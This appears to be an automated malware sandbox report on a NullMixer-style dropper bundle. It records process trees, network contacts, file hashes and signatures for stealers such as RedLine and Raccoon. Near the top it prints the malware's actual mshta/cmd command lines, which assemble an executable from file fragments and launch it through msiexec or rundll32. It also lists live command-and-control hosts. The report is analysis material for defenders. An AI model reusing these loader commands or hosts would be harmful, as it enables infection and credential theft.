"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE( CREAteobjEcT( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " ,0 ,True ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ +6H87pFZ.4 +FDKD47Ef.I1+U56d.R+ JB946RB.I7A + Q_tW.pL+BTDIJ1.FYL+ FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 440
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
C:\Users\Admin\AppData\Local\Temp\f7871e5.exe
"C:\Users\Admin\AppData\Local\Temp\f7871e5.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2524 -s 652
C:\Users\Admin\AppData\Local\Temp\f78aa43.exe
"C:\Users\Admin\AppData\Local\Temp\f78aa43.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 652
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | gazrxlog.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:49264 | tcp | |
| N/A | 127.0.0.1:49268 | tcp | |
| US | 8.8.8.8:53 | whealclothing.xyz | udp |
| US | 8.8.8.8:53 | my-all-group.bar | udp |
| US | 8.8.8.8:53 | m525-blockchain31432.bar | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| FR | 91.121.67.60:23325 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FR | 91.121.67.60:23325 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| FR | 91.121.67.60:23325 | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
| MD5 | a979670adefae9ab376382f3229f3f28 |
| SHA1 | 5b5b75a789e46a2f8ac02fba3d895fa968387c9b |
| SHA256 | a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040 |
| SHA512 | f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b |
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/2812-46-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2812-49-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2812-62-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2812-66-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2812-68-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2812-67-0x0000000064941000-0x000000006494F000-memory.dmp
memory/2812-65-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2812-64-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2812-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2812-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2812-60-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2812-59-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2812-58-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2812-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06ebc37d1c94352.exe
| MD5 | e9133ca1a95483a3331d0f336685302d |
| SHA1 | 48c1348e20b26be8227ed63a1db0f13716f1b8e3 |
| SHA256 | 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b |
| SHA512 | 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57 |
memory/2700-115-0x0000000000400000-0x000000000089B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 91c3dea509f72adb8d5e130c0adae53d |
| SHA1 | e3a51b073755b0e3cb66b370b77609cdb80c17ca |
| SHA256 | 60f0083d4d8c81af9c05cdf7099dc78fe8f76b55c0c71665868fb016186c313b |
| SHA512 | c66cdc4c151d6b10bfe5f2bbd104bbf4ae3d59c6dfdcf8442dc1a6d797df3012d199508e89df7797c78f7d159e931be5b5ba374a02754ed1b3c3ad5d9319b4eb |
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe
| MD5 | 10e13cc7b41d162ab578256f27d297b1 |
| SHA1 | 1d938b7e6e99951d9b8139f078483539120021e6 |
| SHA256 | 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9 |
| SHA512 | 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd |
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
memory/2056-132-0x0000000000830000-0x0000000000898000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
| MD5 | 0e05650d436fd4d92775cd4f65973870 |
| SHA1 | 4d13aaa6b18630d0c89400cee5933130f03bd762 |
| SHA256 | 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16 |
| SHA512 | 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08 |
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat060fd7e42d2.exe
| MD5 | 29c9683aa48f1e3a29168f6b0ff3be04 |
| SHA1 | f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f |
| SHA256 | e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901 |
| SHA512 | a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891 |
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
| MD5 | 1cc8a64b178076dca421fedc3a248a56 |
| SHA1 | db8ed444965577dfb6db4f92ddd8d96a157ddea5 |
| SHA256 | 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345 |
| SHA512 | c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff |
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe
| MD5 | dd2fdd69b9db1cf5764dcfd429a1cf5e |
| SHA1 | c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8 |
| SHA256 | d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe |
| SHA512 | c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d |
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe
| MD5 | 854ea0bc0602795b95da3be8257c530f |
| SHA1 | f243a71edc902ed91d0f990630a73d0d01828c73 |
| SHA256 | c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e |
| SHA512 | 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c |
memory/1032-154-0x0000000000FD0000-0x0000000000FEA000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/1032-161-0x0000000000260000-0x0000000000266000-memory.dmp
memory/2896-160-0x00000000026D0000-0x00000000028D2000-memory.dmp
memory/1816-162-0x0000000002810000-0x000000000295C000-memory.dmp
memory/2812-172-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2812-171-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2812-170-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2812-169-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2812-167-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2812-163-0x0000000000400000-0x000000000051B000-memory.dmp
memory/2860-173-0x0000000000400000-0x0000000000883000-memory.dmp
memory/2896-175-0x0000000002CD0000-0x0000000002D75000-memory.dmp
memory/2896-179-0x0000000002D80000-0x0000000002E12000-memory.dmp
memory/2896-176-0x0000000002D80000-0x0000000002E12000-memory.dmp
memory/1816-181-0x0000000002810000-0x000000000295C000-memory.dmp
memory/2896-180-0x00000000026D0000-0x00000000028D2000-memory.dmp
memory/1656-194-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1656-192-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1656-191-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1656-190-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1656-188-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1656-186-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1656-184-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1656-182-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1816-196-0x0000000002CE0000-0x0000000002D85000-memory.dmp
memory/1816-200-0x0000000002D90000-0x0000000002E22000-memory.dmp
memory/1816-197-0x0000000002D90000-0x0000000002E22000-memory.dmp
memory/2896-202-0x0000000002D80000-0x0000000002E12000-memory.dmp
memory/2896-203-0x0000000002E20000-0x00000000038ED000-memory.dmp
memory/2896-204-0x0000000000930000-0x00000000009BB000-memory.dmp
memory/2896-205-0x00000000038F0000-0x0000000003976000-memory.dmp
memory/2896-208-0x00000000038F0000-0x0000000003976000-memory.dmp
memory/2896-206-0x00000000038F0000-0x0000000003976000-memory.dmp
memory/2896-210-0x00000000000A0000-0x00000000000A4000-memory.dmp
memory/2896-209-0x0000000000090000-0x0000000000091000-memory.dmp
memory/1816-217-0x0000000002D90000-0x0000000002E22000-memory.dmp
memory/1816-218-0x0000000002E30000-0x0000000003B71000-memory.dmp
memory/1816-219-0x0000000003B80000-0x0000000003C0B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\f7871e5.exe
| MD5 | a014b8961283f1e07d7f31ecdd7db62f |
| SHA1 | 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065 |
| SHA256 | 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89 |
| SHA512 | bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869 |
memory/2524-276-0x0000000000340000-0x0000000000348000-memory.dmp
memory/1572-293-0x0000000000D90000-0x0000000000D98000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2976 wrote to memory of 3808 | N/A | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe |
| PID 2976 wrote to memory of 3808 | N/A | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe |
| PID 2976 wrote to memory of 3808 | N/A | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe"
C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe" -u
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1320 set thread context of 1704 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe |
| PID 2436 set thread context of 2536 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe |
| PID 1528 set thread context of 1544 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
